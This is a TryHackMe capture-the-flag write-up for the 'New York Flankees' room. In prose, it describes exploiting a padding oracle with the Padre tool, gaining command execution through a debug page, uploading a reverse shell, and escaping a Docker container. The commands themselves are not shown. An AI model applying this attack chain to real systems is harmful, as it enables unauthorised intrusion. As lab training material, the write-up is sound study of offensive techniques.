Tryhackme — New York Flankees — Write Up
Can you, the rogue adventurer, break through Stefan’s defences to take control of his blog!
Make every campaign better than the last with GetResponse Email Marketing + Landing Pages + Marketing Automation — $49 only
Task 1 Padding For The New York Flankees
New York Flankees was an interesting Box. I got stuck on the initial foothold itself, which took a lot of time. Eventually, I remembered that if nothing is working, it’s best to conduct more recon.
Key Takeaways:
- Nmap scan showed http service running on port 8080.
- Exploit the one of the Oracle’s vulnerability
- Get the Reverse Shell
- Breakthrough the Docker Container.
Recon:
Nmap:
Nmap scan
Started off with Nmap and spotted an HTTP service running on port 8080. Time to dig deeper!
Home Page
While navigating, I noticed something interesting on the Stefan Test page — a JavaScript snippet that seemed out of place. Curiosity piqued, I took a closer look..
Stefen’s Test page(inspect)
JS part of the Stefen’s Test page
let’s try to append the given url path with our machiene ip.
Result after appending urlpath
here we got custom authentication success msg, if we recall this was the first task of stifen’s todo list.
Result after changing a letter from string
If I tried to change any letter, I received a decryption error.
I attempted to crack it with Hashcat, but that turned out to be a bad move, costing me a lot of time and adding another hour to my progress.
After reading the to-do notes, I did a Google search and found a helpful HackTricks page where I learned about Padding Oracle:
Search Results
Padding Oracle
When an application decrypts data, it first removes the encryption and then takes off the padding. If the padding is wrong and the application behaves differently (like showing an error, giving no results, or responding slower), this is called a padding oracle vulnerability.
If you can notice this behavior, you can figure out the encrypted data and even create new encrypted messages.
After learning more about the vulnerability, I found an exploit that was much faster than the one shown in HackTricks: Padre.
Parameters:
- -u : the url
- -err: the error code or error string we received
- -p : number of parallel http connections
- -e : Encoding to apply on the binary data. (in our case we’ll use lhex)
I forgot to specify the encryption mode initially, which didn’t work for me the first time. After adding the encryption mode, we got our admin username and password, as well as the answer to our first question.
When we logged in, a button labeled “Debug” appeared in the right corner.
On the debug page, we found our first flag
This page allowed us to execute commands on the machine.
upon entering a valid command, we received a 200 OK response. Any random input resulted in a 500 Internal Server Error.
It’s time to exploit it….
First, we need to configure our payload and start a Netcat listener and HTTP server.
The next step was to write our shell on the server.
Tip: Always write or upload a shell in the /tmp/ directory because everyone has permission to write there.
and there we go we’ve got the request on our http server which means that our shell is successfully uploaded on the server
Next, we’ll have to give executable permissions to our shell.
we’ve got our shell..
The first thing we do after getting the shell is spawn a TTY. We got our shell directly as root; something’s fishy!
As we explore, I discover that I am in a Docker environment
as we move into the app directory of our docker environment in the docker-compose.yml file found our answer of the third question and our second flag.
now it’s time to break out of Docker Environment.
We’ll use this command to break out of the Docker shell
We can leverage any of the listed images.
